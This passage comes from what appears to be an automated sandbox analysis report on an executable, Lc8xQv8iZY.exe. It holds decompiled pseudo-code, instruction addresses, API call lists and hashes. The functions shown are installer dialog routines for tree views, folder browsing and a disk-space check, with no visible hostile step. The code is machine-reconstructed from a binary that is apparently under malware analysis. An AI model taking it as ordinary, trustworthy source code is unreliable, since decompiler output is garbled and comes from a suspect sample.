											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004048B6(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423f98) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42055c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x420574;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42055c = _t315;
								 *0x420574 = _t315;
								 *0x423fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423f99 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x420574;
									_t196 =  *0x423fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42375c + 0x10)) != _t315) {
											E00404871(0x3ff, 0xfffffffb, E00404889(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x420574);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420574 = GlobalAlloc(0x40,  *0x423fac << 2);
					_t250 = LoadBitmapA( *0x423f80, 0x6e);
					 *0x420568 =  *0x420568 | 0xffffffff;
					_v24 = _t250;
					 *0x420570 = SetWindowLongA(_v8, 0xfffffffc, E00404F37);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42055c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42055c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405D1D(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403FB7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403FB7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420574 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420574 + _t318 * 4) = _t274;
									_t288 =  *( *0x420574 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403FEC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403FEC(_v12);
								L89:
								return E0040401E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                  0x00404954
                                                  0x0040495a
                                                  0x0040495c
                                                  0x00404962
                                                  0x00404968
                                                  0x00404975
                                                  0x0040497e
                                                  0x00404981
                                                  0x00404984
                                                  0x00404bac
                                                  0x00404bb3
                                                  0x00404bc7
                                                  0x00404bb5
                                                  0x00404bb7
                                                  0x00404bba
                                                  0x00404bbb
                                                  0x00404bc2
                                                  0x00404bc2
                                                  0x00404bd3
                                                  0x00404be1
                                                  0x00404be4
                                                  0x00404bfa
                                                  0x00404c72
                                                  0x00404c75
                                                  0x00404c77
                                                  0x00404c81
                                                  0x00404c8f
                                                  0x00404c8f
                                                  0x00404c91
                                                  0x00404c9b
                                                  0x00404ca1
                                                  0x00404cc2
                                                  0x00404ca3
                                                  0x00404cb0
                                                  0x00404cb0
                                                  0x00404ca1
                                                  0x00404c9b
                                                  0x00000000
                                                  0x00404c75
                                                  0x00404bff
                                                  0x00404c0a
                                                  0x00404c0f
                                                  0x00404c16
                                                  0x00404c1d
                                                  0x00404c27
                                                  0x00404c27
                                                  0x00404c2b
                                                  0x00404c30
                                                  0x00404c35
                                                  0x00404c4b
                                                  0x00404c37
                                                  0x00404c37
                                                  0x00404c3f
                                                  0x00404c46
                                                  0x00404c41
                                                  0x00404c41
                                                  0x00404c41
                                                  0x00404c3f
                                                  0x00404c4f
                                                  0x00404c51
                                                  0x00404c5f
                                                  0x00404c60
                                                  0x00404c6c
                                                  0x00404c6f
                                                  0x00404c6f
                                                  0x00404c30
                                                  0x00000000
                                                  0x00404c1d
                                                  0x00404c01
                                                  0x00404c08
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404cc5
                                                  0x00404cc5
                                                  0x00404ccc
                                                  0x00404d40
                                                  0x00404d47
                                                  0x00404d53
                                                  0x00404d53
                                                  0x00404d5c
                                                  0x00404d5e
                                                  0x00404d65
                                                  0x00404d68
                                                  0x00404d68
                                                  0x00404d6e
                                                  0x00404d75
                                                  0x00404d78
                                                  0x00404d78
                                                  0x00404d7e
                                                  0x00404d84
                                                  0x00404d8a
                                                  0x00404d8a
                                                  0x00404d97
                                                  0x00404ee4
                                                  0x00404eeb
                                                  0x00404f08
                                                  0x00404f0e
                                                  0x00404f20
                                                  0x00404f20
                                                  0x00000000
                                                  0x00404d9d
                                                  0x00404d9f
                                                  0x00404da7
                                                  0x00404dab
                                                  0x00404dab
                                                  0x00404db3
                                                  0x00404df4
                                                  0x00404df6
                                                  0x00404e06
                                                  0x00404e09
                                                  0x00404e0e
                                                  0x00404e15
                                                  0x00404e18
                                                  0x00404eba
                                                  0x00404ec0
                                                  0x00404ece
                                                  0x00404edf
                                                  0x00404edf
                                                  0x00000000
                                                  0x00404ece
                                                  0x00404e1e
                                                  0x00404e21
                                                  0x00404e27
                                                  0x00404e2c
                                                  0x00404e2e
                                                  0x00404e30
                                                  0x00404e36
                                                  0x00404e3d
                                                  0x00404e42
                                                  0x00404e49
                                                  0x00404e4c
                                                  0x00404e4c
                                                  0x00404e53
                                                  0x00404e5f
                                                  0x00404e63
                                                  0x00404e65
                                                  0x00404e65
                                                  0x00404e55
                                                  0x00404e57
                                                  0x00404e57
                                                  0x00404e85
                                                  0x00404e91
                                                  0x00404ea0
                                                  0x00404ea0
                                                  0x00404ea2
                                                  0x00404ea5
                                                  0x00404eae
                                                  0x00000000
                                                  0x00404db5
                                                  0x00404dc0
                                                  0x00404dc3
                                                  0x00404dc8
                                                  0x00404dca
                                                  0x00404dce
                                                  0x00404dde
                                                  0x00404de8
                                                  0x00404dea
                                                  0x00404ded
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404dd0
                                                  0x00404dd0
                                                  0x00404dd6
                                                  0x00404dd8
                                                  0x00404dd8
                                                  0x00404dd9
                                                  0x00404dda
                                                  0x00000000
                                                  0x00404dd0
                                                  0x00404db3
                                                  0x00404d97
                                                  0x00404cd4
                                                  0x00000000
                                                  0x00404cea
                                                  0x00404cf4
                                                  0x00404cf9
                                                  0x00000000
                                                  0x00000000
                                                  0x00404d0b
                                                  0x00404d10
                                                  0x00404d1c
                                                  0x00404d1c
                                                  0x00404d1e
                                                  0x00404d2d
                                                  0x00404d2f
                                                  0x00404d36
                                                  0x00404d39
                                                  0x00000000
                                                  0x00404d39
                                                  0x00404cd4
                                                  0x0040498a
                                                  0x0040498f
                                                  0x00404999
                                                  0x0040499a
                                                  0x004049a3
                                                  0x004049ae
                                                  0x004049b9
                                                  0x004049bf
                                                  0x004049cd
                                                  0x004049e2
                                                  0x004049e7
                                                  0x004049f2
                                                  0x004049fb
                                                  0x00404a10
                                                  0x00404a21
                                                  0x00404a2e
                                                  0x00404a2e
                                                  0x00404a33
                                                  0x00404a39
                                                  0x00404a3b
                                                  0x00404a3e
                                                  0x00404a43
                                                  0x00404a48
                                                  0x00404a4a
                                                  0x00404a4a
                                                  0x00404a6a
                                                  0x00404a6a
                                                  0x00404a6c
                                                  0x00404a6d
                                                  0x00404a72
                                                  0x00404a75
                                                  0x00404a78
                                                  0x00404a7c
                                                  0x00404a81
                                                  0x00404a86
                                                  0x00404a8a
                                                  0x00404a8f
                                                  0x00404a94
                                                  0x00404a96
                                                  0x00404a9e
                                                  0x00404b68
                                                  0x00404b7b
                                                  0x00000000
                                                  0x00404aa4
                                                  0x00404aa7
                                                  0x00404aaa
                                                  0x00404aad
                                                  0x00404aad
                                                  0x00404ab3
                                                  0x00404ab9
                                                  0x00404abc
                                                  0x00404ac2
                                                  0x00404ac3
                                                  0x00404ac8
                                                  0x00404ad1
                                                  0x00404ad8
                                                  0x00404adb
                                                  0x00404ade
                                                  0x00404ae1
                                                  0x00404b1d
                                                  0x00404b46
                                                  0x00404b1f
                                                  0x00404b2c
                                                  0x00404b2c
                                                  0x00404ae3
                                                  0x00404ae6
                                                  0x00404af5
                                                  0x00404aff
                                                  0x00404b07
                                                  0x00404b0e
                                                  0x00404b16
                                                  0x00404b16
                                                  0x00404ae1
                                                  0x00404b4c
                                                  0x00404b4d
                                                  0x00404b59
                                                  0x00404b59
                                                  0x00404b66
                                                  0x00404b81
                                                  0x00404b85
                                                  0x00404ba2
                                                  0x00404ba7
                                                  0x00404baa
                                                  0x00000000
                                                  0x00404b87
                                                  0x00404b8c
                                                  0x00404b95
                                                  0x00404f22
                                                  0x00404f34
                                                  0x00404f34
                                                  0x00404b85
                                                  0x00000000
                                                  0x00404b66
                                                  0x00404a9e

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 0040494D
                                                  • GetDlgItem.USER32 ref: 0040495A
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 004049A6
                                                  • LoadBitmapA.USER32 ref: 004049B9
                                                  • SetWindowLongA.USER32 ref: 004049D3
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004049E7
                                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004049FB
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404A10
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404A1C
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404A2E
                                                  • DeleteObject.GDI32(?), ref: 00404A33
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404A5E
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404A6A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AFF
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404B2A
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B3E
                                                  • GetWindowLongA.USER32 ref: 00404B6D
                                                  • SetWindowLongA.USER32 ref: 00404B7B
                                                  • ShowWindow.USER32(?,00000005), ref: 00404B8C
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C8F
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF4
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D09
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D2D
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D53
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404D68
                                                  • GlobalFree.KERNEL32 ref: 00404D78
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DE8
                                                  • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404E91
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA0
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC0
                                                  • ShowWindow.USER32(?,00000000), ref: 00404F0E
                                                  • GetDlgItem.USER32 ref: 00404F19
                                                  • ShowWindow.USER32(00000000), ref: 00404F20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                  • Instruction ID: 18330f5bf3a72d7674edbcfa030aeaae95a9b0ee0e7fe2e829f5852d3ce9e096
                                                  • Opcode Fuzzy Hash: 4775063a13ed137ad28af12a504201eff2421def2a950d44f430de19655b55b3
                                                  • Instruction Fuzzy Hash: AE029DB0E00209AFDB21CF55DD45AAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004043F5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E004043F5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd50;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004055A0(0x3fb, _t146);
					E00405F5D(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004055A0(0x3fb, _t146);
							if(E004058CF(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405CFB(0x41f548, _t146);
							_t87 = E00406087(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405CFB(0x41f548, _t146);
								_t89 = E00405882(0x41f548);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f548,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f548) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f548,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405835(0x41f548) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f548) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404889(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42375c + 0x10)) != _t158) {
									E00404871(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f538);
									} else {
										E004047AC(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x424024 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403FD9(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42056c == _t158) {
									E0040438A();
								}
								 *0x42056c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420580;
							_v60 = E00404746;
							_v56 = _t146;
							_v68 = E00405D1D(_t146, 0x420580, _t166, 0x41f950, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004057EE(_t146);
								_t125 =  *((intOrPtr*)( *0x423f90 + 0x11c));
								if( *((intOrPtr*)( *0x423f90 + 0x11c)) != 0 && _t146 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
									E00405D1D(_t146, 0x420580, _t166, 0, _t125);
									if(lstrcmpiA(0x422f20, 0x420580) != 0) {
										lstrcatA(_t146, 0x422f20);
									}
								}
								 *0x42056c =  *0x42056c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E0040585B(_t146) != 0 && E00405882(_t146) == 0) {
						E004057EE(_t146);
					}
					 *0x423758 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403FB7(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403FB7(_t166);
					E00403FEC(_t165);
					_t138 = E00406087(0xa);
					if(_t138 == 0) {
						L53:
						return E0040401E(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}












































                                                  0x004043f5
                                                  0x004043fb
                                                  0x00404401
                                                  0x0040440e
                                                  0x0040441c
                                                  0x0040441f
                                                  0x00404427
                                                  0x0040442d
                                                  0x0040442d
                                                  0x00404439
                                                  0x0040443c
                                                  0x004044aa
                                                  0x004044b1
                                                  0x00404588
                                                  0x0040458f
                                                  0x0040459e
                                                  0x0040459e
                                                  0x004045a2
                                                  0x004045ac
                                                  0x004045b9
                                                  0x004045bb
                                                  0x004045bb
                                                  0x004045c9
                                                  0x004045d0
                                                  0x004045d7
                                                  0x004045da
                                                  0x00404611
                                                  0x00404613
                                                  0x00404619
                                                  0x0040461e
                                                  0x00404622
                                                  0x00404624
                                                  0x00404624
                                                  0x00404640
                                                  0x00000000
                                                  0x00404642
                                                  0x00404645
                                                  0x00404653
                                                  0x00404659
                                                  0x0040465a
                                                  0x0040465d
                                                  0x00404660
                                                  0x00000000
                                                  0x00404660
                                                  0x004045dc
                                                  0x004045de
                                                  0x004045e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004045e4
                                                  0x004045e4
                                                  0x004045f1
                                                  0x004045f6
                                                  0x00000000
                                                  0x00000000
                                                  0x004045fa
                                                  0x004045fc
                                                  0x004045fc
                                                  0x00404607
                                                  0x0040460a
                                                  0x0040460f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040460f
                                                  0x0040466c
                                                  0x00404676
                                                  0x00404679
                                                  0x0040467c
                                                  0x00404683
                                                  0x00404683
                                                  0x00404685
                                                  0x00404685
                                                  0x0040468a
                                                  0x0040468c
                                                  0x00404694
                                                  0x0040469b
                                                  0x0040469d
                                                  0x004046a8
                                                  0x004046a8
                                                  0x0040469d
                                                  0x004046b8
                                                  0x004046c2
                                                  0x004046ca
                                                  0x004046e5
                                                  0x004046cc
                                                  0x004046d5
                                                  0x004046d5
                                                  0x004046ca
                                                  0x004046ea
                                                  0x004046ef
                                                  0x004046f4
                                                  0x004046fd
                                                  0x004046fd
                                                  0x00404706
                                                  0x00404708
                                                  0x00404708
                                                  0x00404714
                                                  0x0040471c
                                                  0x00404726
                                                  0x00404726
                                                  0x0040472b
                                                  0x00000000
                                                  0x0040472b
                                                  0x004045da
                                                  0x00404591
                                                  0x00404598
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404598
                                                  0x004044b7
                                                  0x004044c0
                                                  0x004044da
                                                  0x004044df
                                                  0x004044e9
                                                  0x004044f0
                                                  0x004044fc
                                                  0x004044ff
                                                  0x00404502
                                                  0x00404509
                                                  0x00404511
                                                  0x00404514
                                                  0x00404518
                                                  0x0040451f
                                                  0x00404527
                                                  0x00404581
                                                  0x00404529
                                                  0x0040452a
                                                  0x00404531
                                                  0x0040453b
                                                  0x00404543
                                                  0x00404550
                                                  0x00404564
                                                  0x00404568
                                                  0x00404568
                                                  0x00404564
                                                  0x0040456d
                                                  0x0040457a
                                                  0x0040457a
                                                  0x00404527
                                                  0x00000000
                                                  0x004044df
                                                  0x004044cd
                                                  0x00000000
                                                  0x00000000
                                                  0x004044d3
                                                  0x00000000
                                                  0x0040443e
                                                  0x0040444b
                                                  0x00404454
                                                  0x00404461
                                                  0x00404461
                                                  0x00404468
                                                  0x0040446e
                                                  0x00404477
                                                  0x0040447a
                                                  0x0040447d
                                                  0x00404485
                                                  0x00404488
                                                  0x0040448b
                                                  0x00404491
                                                  0x00404498
                                                  0x0040449f
                                                  0x00404731
                                                  0x00404743
                                                  0x004044a5
                                                  0x004044a8
                                                  0x00000000
                                                  0x004044a8
                                                  0x0040449f

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00404444
                                                  • SetWindowTextA.USER32(00000000,?), ref: 0040446E
                                                  • SHBrowseForFolderA.SHELL32(?,0041F950,?), ref: 0040451F
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040452A
                                                  • lstrcmpiA.KERNEL32(00422F20,00420580,00000000,?,?), ref: 0040455C
                                                  • lstrcatA.KERNEL32(?,00422F20), ref: 00404568
                                                  • SetDlgItemTextA.USER32 ref: 0040457A
                                                    • Part of subcall function 004055A0: GetDlgItemTextA.USER32 ref: 004055B3
                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FB5
                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,?,?,00000000), ref: 00405FC2
                                                    • Part of subcall function 00405F5D: CharNextA.USER32(?,"C:\Users\user\Desktop\Lc8xQv8iZY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FC7
                                                    • Part of subcall function 00405F5D: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322A,C:\Users\user\AppData\Local\Temp\,00000000,004033DB), ref: 00405FD7
                                                  • GetDiskFreeSpaceA.KERNEL32(0041F548,?,?,0000040F,?,0041F548,0041F548,?,00000001,0041F548,?,?,000003FB,?), ref: 00404638
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404653
                                                    • Part of subcall function 004047AC: lstrlenA.KERNEL32(00420580,00420580,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046C7,000000DF,00000000,00000400,?), ref: 0040484A
                                                    • Part of subcall function 004047AC: wsprintfA.USER32 ref: 00404852
                                                    • Part of subcall function 004047AC: SetDlgItemTextA.USER32 ref: 00404865
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
